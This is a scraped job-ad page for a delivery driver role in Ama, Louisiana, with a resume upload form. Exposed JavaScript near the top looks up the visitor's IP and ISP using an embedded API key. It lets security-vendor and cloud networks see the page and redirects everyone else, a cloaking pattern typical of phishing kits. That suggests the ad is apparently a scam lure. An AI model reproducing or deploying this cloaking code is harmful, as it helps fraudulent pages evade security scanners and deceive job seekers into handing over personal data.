Restaurant Delivery – Receive Tips

Restaurant Delivery – Receive Tips

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our team as a Restaurant Delivery Driver in Ama, Louisiana, and enjoy earning 100% of customer tips! This role offers flexible hours and the opportunity to earn competitive pay through tips and delivery fees.

Responsibilities include:

  • Receiving and delivering food orders promptly and accurately
  • Providing excellent customer service with a friendly and professional attitude
  • Ensuring food quality and safety during delivery
  • Managing delivery routes efficiently to maximize tips and minimize wait times
  • Handling payments and ensuring proper tip collection

Skills needed:

  • Valid driver’s license and reliable vehicle
  • Strong communication and interpersonal skills
  • Ability to navigate using GPS or maps
  • Time management and organization skills
  • Customer-focused attitude and professionalism

Benefits:

  • Keep 100% of customer tips
  • Flexible scheduling options
  • Competitive pay including tips and delivery bonuses
  • Supportive work environment
  • Opportunity to earn extra income
Emploment Location
Ama, Louisiana

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf